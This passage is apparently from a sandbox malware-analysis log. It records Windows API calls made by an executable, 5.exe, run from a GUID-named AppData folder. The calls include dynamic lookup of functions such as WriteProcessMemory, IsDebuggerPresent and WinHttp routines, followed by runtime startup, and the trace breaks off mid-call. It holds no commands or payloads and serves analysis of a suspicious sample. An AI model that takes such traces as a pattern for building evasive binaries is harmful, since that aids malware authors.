WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.436] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.449] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.463] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.480] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.581] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.588] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.604] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.631] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.635] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.655] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.756] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.681] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0134.946] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.061] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.325] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.537] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.552] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.591] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.628] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.704] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.724] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.740] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.762] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0135.804] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0136.481] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.058] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.114] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.159] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.367] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.421] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.426] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.442] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.467] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.473] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.489] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0137.504] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) Process: id = "11" image_name = "5.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe" page_root = "0x3d4a3000" os_pid = "0xaa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x34c" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 112 os_tid = 0xae8 [0124.102] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0124.103] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameW") returned 0x76d440d4 [0124.103] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexW") returned 0x76d4424c [0124.103] GetProcAddress (hModule=0x76d30000, lpProcName="HeapCompact") returned 0x76d44717 [0124.103] GetProcAddress (hModule=0x76d30000, lpProcName="OpenFile") returned 0x76d5a2ff [0124.103] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0124.103] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0124.136] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0124.136] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0124.137] GetProcAddress (hModule=0x76d30000, lpProcName="GetQueuedCompletionStatus") returned 0x76d5d3c3 [0124.137] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0124.137] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0124.137] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0124.137] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsA") returned 0x76d4e349 [0124.137] GetProcAddress (hModule=0x76d30000, lpProcName="CreateNamedPipeW") returned 0x76dc414b [0124.137] GetProcAddress (hModule=0x76d30000, lpProcName="WaitNamedPipeW") returned 0x76dc45df [0124.137] GetProcAddress (hModule=0x76d30000, lpProcName="CreateActCtxW") returned 0x76d49247 [0124.137] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0124.137] GetProcAddress (hModule=0x76d30000, lpProcName="SetHandleCount") returned 0x76d4cb29 [0124.137] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0124.138] GetProcAddress (hModule=0x76d30000, lpProcName="AddRefActCtx") returned 0x76d5d540 [0124.138] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0124.138] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0124.138] GetProcAddress (hModule=0x76d30000, lpProcName="AssignProcessToJobObject") returned 0x76d6c862 [0124.138] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemPowerStatus") returned 0x76d5f680 [0124.138] GetProcAddress (hModule=0x76d30000, lpProcName="FreeConsole") returned 0x76de6aa8 [0124.138] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAdjustment") returned 0x76dc43bf [0124.138] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0124.138] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0124.138] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleAliasW") returned 0x76de659b [0124.138] GetProcAddress (hModule=0x76d30000, lpProcName="GetVolumePathNamesForVolumeNameW") returned 0x76d50b26 [0124.138] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreA") returned 0x76d6d172 [0124.139] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0124.139] GetProcAddress (hModule=0x76d30000, lpProcName="GetBinaryTypeA") returned 0x76dc9909 [0124.139] GetProcAddress (hModule=0x76d30000, lpProcName="GetCompressedFileSizeA") returned 0x76dbccd1 [0124.139] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0124.139] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleFontSize") returned 0x76de79ff [0124.139] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0124.139] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0124.139] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSemaphore") returned 0x76d5d3ab [0124.139] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoA") returned 0x76d40e00 [0124.139] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExA") returned 0x76dc427f [0124.139] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0124.139] GetProcAddress (hModule=0x76d30000, lpProcName="ChangeTimerQueueTimer") returned 0x76dc40eb [0124.139] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0124.140] GetProcAddress (hModule=0x76d30000, lpProcName="CreateTimerQueueTimer") returned 0x76d5f7eb [0124.140] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0124.140] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0124.140] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0124.140] GetProcAddress (hModule=0x76d30000, lpProcName="AddAtomW") returned 0x76d5cdfc [0124.140] GetProcAddress (hModule=0x76d30000, lpProcName="FindAtomA") returned 0x76d5ede4 [0124.140] GetProcAddress (hModule=0x76d30000, lpProcName="WriteProfileStringA") returned 0x76dba79a [0124.140] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstChangeNotificationA") returned 0x76dc428f [0124.140] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExA") returned 0x76d44913 [0124.140] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleTitleW") returned 0x76d5a996 [0124.140] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0124.140] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesExW") returned 0x76d44574 [0124.140] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadAffinityMask") returned 0x76d605a0 [0124.141] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandle") returned 0x76d453ae [0124.141] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAddAtomW") returned 0x76d43215 [0124.141] GetProcAddress (hModule=0x76d30000, lpProcName="OpenFileMappingA") returned 0x76d44c1b [0124.141] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0124.141] GetProcAddress (hModule=0x76d30000, lpProcName="WriteProcessMemory") returned 0x76d5d9e0 [0124.141] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0124.141] GetProcAddress (hModule=0x76d30000, lpProcName="CommConfigDialogW") returned 0x76dc7b9d [0124.141] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0124.141] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0124.141] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0124.141] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0124.141] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0124.141] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0124.142] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0124.142] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0124.142] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0124.142] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0124.142] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0124.142] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0124.142] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0124.142] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0124.142] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0124.142] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0124.142] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0124.142] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0124.142] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0124.143] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0124.143] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0124.143] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0124.143] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0124.143] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0124.143] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0124.143] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0124.143] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0124.143] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0124.143] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0124.143] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0124.143] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0124.144] GetProcAddress (hModule=0x76d30000, lpProcName="HeapCreate") returned 0x76d44a2d [0124.144] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0124.144] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0124.144] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0124.144] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0124.144] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0124.144] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0124.144] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0124.144] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0124.144] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0124.144] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0124.144] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0124.144] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0124.144] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0124.145] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0124.145] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0124.145] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0124.145] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0124.145] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleA") returned 0x76d412fc [0124.145] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleOutputCP") returned 0x76d59b0f [0124.145] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0124.145] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringA") returned 0x76d6bc39 [0124.145] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeA") returned 0x76d68266 [0124.145] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0124.145] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0124.145] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0124.145] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0124.146] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0124.146] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0124.146] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x75620000 [0124.146] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpCloseHandle") returned 0x75622c01 [0124.146] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0124.146] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0124.146] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xe165ab20, dwHighDateTime=0x1d6d58a)) [0124.146] GetCurrentProcessId () returned 0xaa8 [0124.146] GetCurrentThreadId () returned 0xae8 [0124.146] GetTickCount () returned 0x1150cbe [0124.147] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=24432022646) returned 1 [0124.147] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x405afc)) [0124.147] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x5580000 [0124.147] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0124.147] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0124.147] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0124.148] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0124.148] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0124.148] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0124.148] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0124.148] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0124.148] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0124.148] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0124.148] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0124.149] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0124.149] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0124.149] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0124.149] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0124.149] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0124.149] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0124.149] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0124.149] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0124.151] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0124.151] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0124.151] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x214) returned 0x55807d0 [0124.151] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0124.151] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0124.151] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0124.151] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0124.151] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0124.152] GetCurrentThreadId () returned 0xae8 [0124.152] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0124.152] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x800) returned 0x55809f0 [0124.152] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0124.152] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0124.152] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0124.152] SetHandleCount (uNumber=0x20) returned 0x20 [0124.152] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe\" " [0124.152] GetEnvironmentStringsW () returned 0x52ff570* [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x0, Size=0xaca) returned 0x55811f8 [0124.153] FreeEnvironmentStringsW (penv=0x52ff570) returned 1 [0124.153] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x46d950, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe")) returned 0x56 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x0, Size=0xb6) returned 0x5581cd0 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x98) returned 0x5581d90 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x3e) returned 0x5581e30 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x6c) returned 0x5581e78 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x6e) returned 0x5581ef0 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x78) returned 0x5581f68 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x62) returned 0x5581fe8 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x2e) returned 0x5582058 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x48) returned 0x5582090 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x28) returned 0x55820e0 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x1a) returned 0x5582110 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x4a) returned 0x5582138 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x72) returned 0x5582190 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x30) returned 0x5582210 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x2e) returned 0x5582248 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x1c) returned 0x5582280 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0xd2) returned 0x55822a8 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x7c) returned 0x5582388 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x36) returned 0x5582410 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x3a) returned 0x5582450 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x90) returned 0x5582498 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x24) returned 0x5582530 [0124.153] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x30) returned 0x5582560 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x36) returned 0x5582598 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x48) returned 0x55825d8 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x52) returned 0x5582628 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x3c) returned 0x5582688 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x82) returned 0x55826d0 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x2e) returned 0x5582760 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x1e) returned 0x5582798 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x2c) returned 0x55827c0 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x54) returned 0x55827f8 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x52) returned 0x5582858 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x2a) returned 0x55828b8 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x3c) returned 0x55828f0 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x54) returned 0x5582938 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x24) returned 0x5582998 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x30) returned 0x55829c8 [0124.154] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x8c) returned 0x5582a00 [0124.154] HeapFree (in: hHeap=0x5580000, dwFlags=0x0, lpMem=0x55811f8 | out: hHeap=0x5580000) returned 1 [0124.154] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0124.154] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0124.154] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0124.156] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x800) returned 0x55811f8 [0124.156] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x8, Size=0x80) returned 0x5581a00 [0124.156] GetLastError () returned 0x0 [0124.156] SetLastError (dwErrCode=0x0) [0124.156] GetLastError () returned 0x0 [0124.156] SetLastError (dwErrCode=0x0) [0124.156] GetLastError () returned 0x0 [0124.156] SetLastError (dwErrCode=0x0) [0124.156] GetACP () returned 0x4e4 [0124.156] RtlAllocateHeap (HeapHandle=0x5580000, Flags=0x0, Size=0x220) returned 0x5581a88 [0124.156] GetLastError () returned 0x0 [0124.156] SetLastError (dwErrCode=0x0) [0124.156] IsValidCodePage (CodePage=0x4e4) returned 1 [0124.157] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0124.157] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0124.157] GetLastError () returned 0x0 [0124.157] SetLastError (dwErrCode=0x0) [0124.157] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0124.157] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0124.157] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, 